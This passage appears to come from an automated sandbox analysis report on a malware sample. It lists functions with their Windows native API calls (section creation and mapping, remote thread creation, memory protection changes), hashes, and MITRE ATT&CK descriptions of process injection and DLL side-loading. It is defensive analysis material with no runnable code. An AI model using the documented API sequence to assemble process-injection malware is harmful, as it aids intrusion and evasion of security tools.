NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Function 02BA003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BA024D

Strings

kernel32.dll, xrefs: 02BA008F, 02BA0095
cess, xrefs: 02BA018D

Memory Dump Source

Source File: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ba0000_rghrbbi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b8fad2149ce1c72ead298f70c1fe5a9f46f924ad6fd9cff4a247a45f8ac33ccc
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 51527974A05229DFDB64CF68C994BACBBB1BF09304F1484D9E94DAB351DB30AA94CF14

Function 00415440 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041551F
GetProcAddress.KERNEL32(00000000,00419CC8), ref: 0041555C
VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 0041557B

Strings

, xrefs: 00415485

Memory Dump Source

Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

Function 02D2A793 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D2A7BB
Module32First.KERNEL32(00000000,00000224), ref: 02D2A7DB

Memory Dump Source

Source File: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d27000_rghrbbi.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 56c2e47a822ad6e335ffbe326bf5532b0a11e6f3cb6bc91cb98f9ea70f9e9f2f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 92F096365007216FD7203BF99C8CB6FB6FCEF59628F100569E646925C0DB70EC498A65

Function 02BA0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02BA0223,?,?), ref: 02BA0E19
SetErrorMode.KERNELBASE(00000000,?,?,02BA0223,?,?), ref: 02BA0E1E

Memory Dump Source

Source File: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ba0000_rghrbbi.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 6caa47b8ee7731fb4f42fe3c73b0a19dde9cf11d5998d059322002e2c43fd413
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: AFD0123154512877DB003A94DC09BCD7B1CDF09B66F008451FB0DD9080C770954046E5

Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F

Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F

Function 02D2A452 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D2A4A3

Memory Dump Source

Source File: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d27000_rghrbbi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9adb32bb95d37c20f11215107135b8cff17ddd0d51fc42dfab454d9c2e697454
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6F112D79A00208EFDB01DF98C985E98BBF5EF08751F058095F9489B361D371EA50EF90

Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B

Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

Function 00415410 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B17CDC,00415A8D), ref: 00415418

Memory Dump Source

Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14

Non-executed Functions

Function 00415610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 0041563D
WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 00415661
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415669
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1

Strings

-, xrefs: 004156DE

Memory Dump Source

Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd

Similarity

API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 1791614364-2547889144
Opcode ID: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
Instruction ID: 327a1d9486ecdfb24dc002fa9ea073514ce32c0532a3afa617439fefb1992a41
Opcode Fuzzy Hash: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
Instruction Fuzzy Hash: 7E210830A84304EBD7509F54DC46FD97BB4EB48711F9280A5FA4DAA1C0CE7859C49BDD

Function 00415679 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1

Strings

-, xrefs: 004156DE

Memory Dump Source

Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd

Similarity

API ID: CalendarInfoNameObjectOpenPathShort
String ID: -
API String ID: 2381848886-2547889144
Opcode ID: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
Instruction ID: 7e98e6f74bb160639cfe8ebb3c1cacb5dac1db98f22b652a1399afec41121bf8
Opcode Fuzzy Hash: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
Instruction Fuzzy Hash: 2601F431A84344DADB708F509C82BD97BA4FB48325F924199FA8C6F1C0CEB519C4DBC9

Function 00415710 Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415744
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041575F
HeapDestroy.KERNEL32(00000000), ref: 0041577E
GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415788

Memory Dump Source

Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
Instruction ID: 75f5f447a75e1158ec7b8286dcbe49327f873da7596033eeb3f7384675a4dd99
Opcode Fuzzy Hash: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
Instruction Fuzzy Hash: C301A771A80108DFE750EBA4EC86BDA77A8A70C346F814036F605D72C0EF7459448B99

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
